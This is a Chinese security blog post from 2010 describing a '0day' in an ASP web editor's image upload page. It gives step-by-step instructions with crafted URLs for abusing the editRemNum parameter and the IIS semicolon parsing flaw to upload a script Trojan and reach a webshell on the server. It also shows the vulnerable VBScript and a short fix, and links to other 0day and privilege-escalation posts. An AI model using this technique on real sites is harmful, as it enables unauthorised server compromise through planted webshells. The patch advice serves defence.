MSN Editor 0DAY
发布:admin | 发布时间: 2010年2月1日简单说下利用的方法吧。
点击图片上传后会出现上传页面,地址为
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的图片上传后,地址为
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明显。图片的地址是根据RemNum后面的编号生成的。
利用很简单 配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012
变成下面这个地址
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在浏览器里打开
然后选择你的脚本木马上传
将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif
然后直接打开就是我们的小马地址!
[红科网安]漏洞修补建议:
关键代码:
if editRemNum<>"" then
remNum = editRemNum
else
Randomize
remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
end if
remFileName = remNum&"_"&(editImageNum+1)&".gif"
end if
去掉自定义部分,只留下随机参数即可。
保留代码:
Randomize
remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
end if
remFileName = remNum&"_"&(editImageNum+1)&".gif"
文章如转载,请注明转载自:http://www.5iadmin.com/post/200.html
- 相关文章:
搜狗输入法漏洞获取系统权限0day再述 (2010-1-28 10:17:29)
博贤科技管理系统漏洞oday (2010-1-28 10:16:42)
Windows本地提权0day(支持WEBSHELL测试版) (2010-1-27 10:27:9)
windows最新0day 通杀所有版本提权工具 (2010-1-26 14:35:22)
极光 0day漏洞 (2010-1-26 10:5:33)
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。